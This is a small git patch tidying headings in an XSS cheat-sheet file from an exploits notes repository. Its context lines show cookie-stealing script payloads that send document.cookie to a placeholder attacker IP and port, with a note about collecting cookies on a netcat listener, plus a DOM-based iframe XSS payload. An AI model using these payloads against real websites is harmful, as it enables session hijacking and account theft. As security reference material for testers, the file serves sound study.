From bb4cd3b7d189486fbc77bb3f6e7649f4cf285752 Mon Sep 17 00:00:00 2001
From: gurkenhabicht <info@intheopen.org>
Date: Sun, 7 Jul 2024 21:26:09 +0200
Subject: [PATCH] cleanup

---
 Exploits/Web/XSS.md | 5 ++---
 1 file changed, 2 insertions(+), 3 deletions(-)

diff --git a/Exploits/Web/XSS.md b/Exploits/Web/XSS.md
index ea5132f..68ba7b7 100644
--- a/Exploits/Web/XSS.md
+++ b/Exploits/Web/XSS.md
@@ -35,7 +35,6 @@ Open nc port and collect cookies
 ```javascript
 <script>document.location='http://<attacker-IP>:<attacker-Port>/XSS/grabber.php?c='+document.cookie</script>
 <script>var i=new Image;i.src="http://<attacker-IP>:<attacker-Port>/?"+document.cookie;</script>
-
 ```
 
 ## Reflected XSS
@@ -48,7 +47,7 @@ into clicking a URL to execute their malicious payload.
 * URL parameters inside GET queries
 * File paths
 
-### Usage
+### Reflected XSS Usage
 
 As script inside parameter
 
@@ -106,7 +105,7 @@ page.
 <iframe src="https://vulnerable-website.com#" onload="this.src+='<img src=1 onerror=alert(1)>'">
 ```
 
-### Usage
+### DOM based Usage
 
 Find the sub-object inside the document through ending the string and execute a
 javascript alert when hovering over the sub-object.